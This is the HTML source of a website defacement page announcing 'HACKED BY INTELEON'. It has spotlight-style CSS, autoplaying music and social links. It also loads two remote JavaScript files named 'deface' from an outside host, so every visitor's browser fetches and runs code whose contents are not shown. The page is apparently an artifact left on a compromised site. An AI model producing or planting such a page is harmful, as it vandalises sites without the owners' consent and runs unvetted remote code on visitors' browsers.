<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    
    <title>HACKED BY INTELEON</title>  
    <style type="text/css" media="all">
        html, body {
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
        }
        #text-shadow-box {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            background: #444;
            font-family: Helvetica, Arial, sans-serif;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            -webkit-user-select: none;
        }
        #text-shadow-box #tsb-text {
            position: absolute;
            top: 40%;
            left: 0;
            width: 100%;
            font-size: 100px;
            color: transparent;
            text-shadow: black 0px -45.2px 19px;
            text-align: center;
            text-transform: uppercase;
        }
        #text-shadow-box #tsb-wall {
            position: absolute;
            top: 80%; /* Adjusted position */
            left: 0;
            width: 100%;
            text-align: center;
        }
        #text-shadow-box #tsb-wall p {
            display: flex; /* Make it a flex container */
            justify-content: center; /* Center align items */
            gap: 20px; /* Space between links */
            font-size: 18px;
            line-height: 1.5em;
            color: #222;
            margin: 1.5em auto;
            cursor: default;
        }
        #text-shadow-box #tsb-wall p a {
            color: #fff;
            text-decoration: none;
        }
        #text-shadow-box #tsb-wall p a:hover {
            text-decoration: none;
            color: #000;
            background: #fff;
        }
        #tsb-spot {
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            pointer-events: none;
            background: -webkit-gradient(radial, center center, 0, center center, 450, from(rgba(0, 0, 0, 0)), to(rgba(0, 0, 0, 1)));
        }
    </style>
    <!--[if IE]>
    <style type="text/css">
        #tsb-spot { display: none; }
        #tsb-ie {
            position: absolute;
            top: -90%;
            left: -50%;
            width: 200%;
            height: 334%;
            background: url;
        }
        .style1 { color: #FF0000; }
        .style2 { background-color: #FFFF00; }
        .style3 { background-color: #000000; }
    </style>
    <![endif]-->  
</head>
<body>
    <audio src="https://nathanprinsley-files.prinsh.com/data-1/mp3/alan-walker_alone.mp3" loop="1" autoplay="1"></audio>
    <div id="text-shadow-box">    
        <div id="tsb-box" style="-webkit-box-shadow: black 0px -10.8px 37px;"></div>     
        <p id="tsb-text" style="text-shadow: black 34.4px -10.8px 17px;">INTELEON</p>     
        <div id="tsb-wall">
            <p>
                <a href="https://www.facebook.com/zuck">FB</a> 
                <a href="https://x.com/elonmusk">X</a> 
                <a href="https://t.me/durov">TELEGRAM</a>
            </p>
        </div>     
        <div id="tsb-spot" style="background-position: -86px -102px;"></div> 
    </div>         

    <script type="application/javascript">
        document.addEventListener('mousemove', (event) => {
            const x = event.clientX; 
            const y = event.clientY; 
            document.body.style.backgroundColor = 'rgba(0, 0, 0, 0.5)'; // Set background color
            // Create a light effect based on mouse position
            document.body.style.boxShadow = `${x}px ${y}px 100px rgba(255, 255, 255, 0.3)`;
        });
    </script>
    <script type="application/javascript" src="https://nathanprinsley-files.prinsh.com/data-1/js/deface(14-01).js"></script>
    <script type="application/javascript" src="https://nathanprinsley-files.prinsh.com/data-1/js/deface(14-02).js"></script>
</body>
</html>
